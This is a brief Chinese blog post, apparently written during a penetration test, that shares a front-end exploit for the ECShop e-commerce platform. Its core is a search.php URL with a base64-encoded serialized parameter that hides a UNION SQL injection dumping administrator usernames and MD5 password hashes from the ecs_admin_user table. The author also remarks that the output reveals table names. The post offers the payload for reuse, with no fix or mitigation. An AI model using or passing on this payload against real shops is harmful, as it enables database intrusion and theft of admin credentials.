ecshop前台payload

今天做渗透测试,碰见一个后台是ecshop的,就去百度了一下ecshop漏洞,发现一个有意思的payload

search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319


可以看见用户名和md5密码,但是我解密后提示错误,还可以看到一些表 名,还算有用。

你可能感兴趣的:(ecshop前台payload)